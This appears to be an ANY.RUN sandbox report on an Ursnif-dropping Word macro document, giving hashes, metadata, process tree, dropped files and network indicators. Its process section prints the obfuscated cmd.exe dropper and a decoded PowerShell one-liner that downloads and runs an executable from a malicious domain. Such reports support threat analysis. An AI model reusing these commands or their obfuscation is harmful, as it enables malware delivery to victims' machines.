analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

d12fef3702705fee7709fcba7a3564f7.doc

Full analysis: https://app.any.run/tasks/ab921572-b7f3-48d3-9dec-cf721c96e0f0
Verdict: Malicious activity
Threats:

Ursnif is a banking Trojan that usually infects corporate victims. It is based on an old malware but was substantially updated over the years and became quite powerful. Today Ursnif is one of the most widely spread banking Trojans in the world.

Analysis date: December 14, 2018, 20:24:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
gozi
ursnif
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 08:51:00 2018, Last Saved Time/Date: Fri Dec 14 08:51:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 45, Security: 0
MD5:

D12FEF3702705FEE7709FCBA7A3564F7

SHA1:

083D62B92CE6FD854BBEA6189CC2F541C961681D

SHA256:

5AA4B6AD210954D70177DA7FCD42049CBC9A5BEB4C8AD20CD0960B5DCF515757

SSDEEP:

1536:wocn1kp59gxBK85fBK+a9NzfCB6NDNVaDxw7l:p41k/W48yyKeDxw7l

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • URSNIF was detected

      • powershell.exe (PID: 2960)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3464)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3464)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3180)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2644)
    • Creates files in the user directory

      • powershell.exe (PID: 2960)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3464)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3464)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 51
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Cyrillic
Security: None
Characters: 45
Words: 7
Pages: 1
ModifyDate: 2018:12:14 08:51:00
CreateDate: 2018:12:14 08:51:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs #URSNIF powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
3464"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\d12fef3702705fee7709fcba7a3564f7.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2644c:\ssfhWrnAwiGk\IUABXoFz\rTrTPBat\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set DpF=SWSYLtGrRdGUsiRJToMpqc(vDH-.au/OwCFP}=)8ymNVZ bQ0\kKx9z$f@;g'le5I,1{hj:n+?&&for %e in (55,13,13,17,37,60,17,50,33,60,58,55,32,1,13,37,71,62,32,26,17,46,69,62,21,5,45,42,62,5,27,1,62,46,33,61,13,62,71,5,58,55,42,61,20,37,60,68,5,5,19,70,30,30,40,29,61,28,32,71,62,12,12,62,27,21,17,41,30,5,40,21,61,28,41,30,56,7,62,12,12,7,27,19,68,19,73,61,37,32,40,59,52,66,48,27,5,50,71,60,27,2,19,61,13,5,22,60,57,60,38,58,55,71,51,42,37,60,2,15,10,60,58,55,21,41,32,45,37,45,60,39,63,53,60,58,55,18,68,33,37,60,12,71,47,60,58,55,3,21,4,37,55,62,71,23,70,5,62,41,19,72,60,49,60,72,55,21,41,32,72,60,27,62,52,62,60,58,56,17,7,62,28,21,68,22,55,44,2,13,45,13,71,45,55,42,61,20,38,67,5,7,40,67,55,32,1,13,27,24,17,32,71,61,17,28,9,34,13,61,62,22,55,44,2,13,65,45,55,3,21,4,38,58,55,32,25,71,37,60,2,61,54,60,58,64,56,45,22,22,10,62,5,26,64,5,62,41,45,55,3,21,4,38,27,61,62,71,59,5,68,45,26,59,62,45,39,48,48,48,48,38,45,67,64,71,23,17,50,62,26,64,5,62,41,45,55,3,21,4,58,55,44,23,31,37,60,56,14,21,60,58,46,7,62,28,50,58,36,36,21,28,5,21,68,67,36,36,55,54,28,35,37,60,43,12,35,60,58,79)do set GAd=!GAd!!DpF:~%e,1!&&if %e geq 79 powershell.exe "!GAd:~-339!""c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3180CmD /V:/C"set DpF=SWSYLtGrRdGUsiRJToMpqc(vDH-.au/OwCFP}=)8ymNVZ bQ0\kKx9z$f@;g'le5I,1{hj:n+?&&for %e in (55,13,13,17,37,60,17,50,33,60,58,55,32,1,13,37,71,62,32,26,17,46,69,62,21,5,45,42,62,5,27,1,62,46,33,61,13,62,71,5,58,55,42,61,20,37,60,68,5,5,19,70,30,30,40,29,61,28,32,71,62,12,12,62,27,21,17,41,30,5,40,21,61,28,41,30,56,7,62,12,12,7,27,19,68,19,73,61,37,32,40,59,52,66,48,27,5,50,71,60,27,2,19,61,13,5,22,60,57,60,38,58,55,71,51,42,37,60,2,15,10,60,58,55,21,41,32,45,37,45,60,39,63,53,60,58,55,18,68,33,37,60,12,71,47,60,58,55,3,21,4,37,55,62,71,23,70,5,62,41,19,72,60,49,60,72,55,21,41,32,72,60,27,62,52,62,60,58,56,17,7,62,28,21,68,22,55,44,2,13,45,13,71,45,55,42,61,20,38,67,5,7,40,67,55,32,1,13,27,24,17,32,71,61,17,28,9,34,13,61,62,22,55,44,2,13,65,45,55,3,21,4,38,58,55,32,25,71,37,60,2,61,54,60,58,64,56,45,22,22,10,62,5,26,64,5,62,41,45,55,3,21,4,38,27,61,62,71,59,5,68,45,26,59,62,45,39,48,48,48,48,38,45,67,64,71,23,17,50,62,26,64,5,62,41,45,55,3,21,4,58,55,44,23,31,37,60,56,14,21,60,58,46,7,62,28,50,58,36,36,21,28,5,21,68,67,36,36,55,54,28,35,37,60,43,12,35,60,58,79)do set GAd=!GAd!!DpF:~%e,1!&&if %e geq 79 powershell.exe "!GAd:~-339!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2960powershell.exe "$iio='okC';$wWi=new-object Net.WebClient;$Nlq='http://yulawnesse.com/tyclam/fressr.php?l=wygx10.tkn'.Split('@');$nKN='SJG';$cmw = '859';$MhC='snQ';$YcL=$env:temp+'\'+$cmw+'.exe';foreach($ZSi in $Nlq){try{$wWi.DownloadFile($ZSi, $YcL);$wHn='Slz';If ((Get-Item $YcL).length -ge 80000) {Invoke-Item $YcL;$ZvO='fRc';break;}}catch{}}$zaP='VsP';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 412
Read events
949
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
5

Dropped files

PID
Process
Filename
Type
3464WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA607.tmp.cvr
MD5:
SHA256:
3464WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BD9B82F8.wmf
MD5:
SHA256:
3464WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FD13FBC6.wmf
MD5:
SHA256:
2960powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0PUBF1XN7OABXJFT7LIY.temp
MD5:
SHA256:
2960powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b1de.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3464WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:EC4D41D192A903548E9460B9E58FB1C5
SHA256:BD648F9E7E972B92FE0698F9B9A4E817E0F389B6076A0352A72C0F52E5BA1647
3464WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$2fef3702705fee7709fcba7a3564f7.docpgc
MD5:ACE9441D304918AE02C4733986389A5F
SHA256:E9F1118DAEAE427CD68F16F1ABC437C4A50E770DAB0FD976E98D279AD03E3C24
2960powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3464WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\614C7699.wmfwmf
MD5:81821EE3032795FAFE671034814184E9
SHA256:D5E4D126D7A4E262FFAFD6D0E9C69903CEAF08A3FD0B6583463D7EE63FA18C81
3464WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:7C45A5BCA47C2C12B85AF435A8FF8FB0
SHA256:1B6BEADCFAF6F3B81CCAD48373544305399C5B159F46075D45014E981435FD58
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2960
powershell.exe
GET
404
78.155.220.222:80
http://yulawnesse.com/tyclam/fressr.php?l=wygx10.tkn
RU
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2960
powershell.exe
78.155.220.222:80
yulawnesse.com
OOO Network of data-centers Selectel
RU
malicious

DNS requests

Domain
IP
Reputation
yulawnesse.com
  • 78.155.220.222
malicious

Threats

Found threats are available for the paid subscriptions
1 ETPRO signatures available at the full report
No debug info